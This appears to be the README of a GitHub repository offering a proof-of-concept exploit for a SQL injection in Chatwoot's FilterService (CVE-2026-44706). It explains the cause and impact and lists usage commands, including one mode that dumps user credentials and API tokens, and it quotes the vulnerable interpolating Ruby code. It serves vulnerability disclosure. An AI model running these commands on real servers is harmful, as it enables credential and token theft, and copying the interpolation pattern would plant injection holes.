Skip to content

hakaioffsec/CVE-2026-44706

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 

Repository files navigation

SQL Injection in Chatwoot FilterService

A proof-of-concept exploit for CVE-2026-44706, a SQL Injection vulnerability in Chatwoot's FilterService#lt_gt_filter_values that allows any authenticated agent to read the entire PostgreSQL database including user credentials and API tokens. Read the full article here.

Usage:

# Verify injection (boolean-based)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check

# Time-based confirmation
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased

# Extract arbitrary SQL query result
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"

# Dump all user credentials and API tokens
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds

Vulnerable Versions

  • Chatwoot ≤ 4.11.1

Root Cause

In app/services/filter_service.rb (line 91), user input is interpolated directly into SQL without parameterization:

def lt_gt_filter_values(query_hash)
  value = query_hash['values'][0]          # ← user input, no sanitization
  operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
  "#{operator} '#{value}'::#{attribute_data_type}"   # ← raw interpolation
end

Every other operator in the class uses bind parameters (:value_N). Only is_greater_than and is_less_than are vulnerable.

Affected Endpoints

  • POST /api/v1/accounts/:id/conversations/filter
  • POST /api/v1/accounts/:id/contacts/filter

Impact

CWE-89 SQL Injection. Any authenticated agent/admin can:

  • Read the entire database users, messages, tokens, cross-account data
  • Steal credentials bcrypt hashes for offline cracking
  • Steal API tokens impersonate any user including SuperAdmins
  • DoS pg_sleep() to exhaust database connections

CVSS

8.8 High CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Disclaimer

This tool is for educational and research purposes only. Use it only on systems you own or have explicit permission to test. The author is not responsible for any misuse or damage caused by this program.

QuimeraX Intelligence

QuimeraX Intelligence is an advanced EASM and Cyber Threat Intelligence platform specializing in identifying critical vulnerabilities in complex systems. The platform proactively monitors, detects, and alerts clients about security threats, ensuring transparency and rapid response to potential risks. Clients receive immediate notifications and comprehensive reports if their systems are found vulnerable, enabling them to take protective action. learn more

Hakai Security

Hakai Security is a cybersecurity company founded by security professionals, committed to technical excellence. We offer tailored security solutions including advanced penetration testing, realistic Red Team simulations, and secure development practices to proactively protect our clients' assets from evolving cyber threats.

Hacking Club

Hacking Club is the training platform where you learn cybersecurity through hands-on lessons, labs, and challenges created by experts working in our security consulting firm: straight from the battlefield to your training. Practice the vulnerability presented in this repository by the hacking club! learn more

About

Chatwoot SQL injection in FilterService

Resources

Stars

6 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages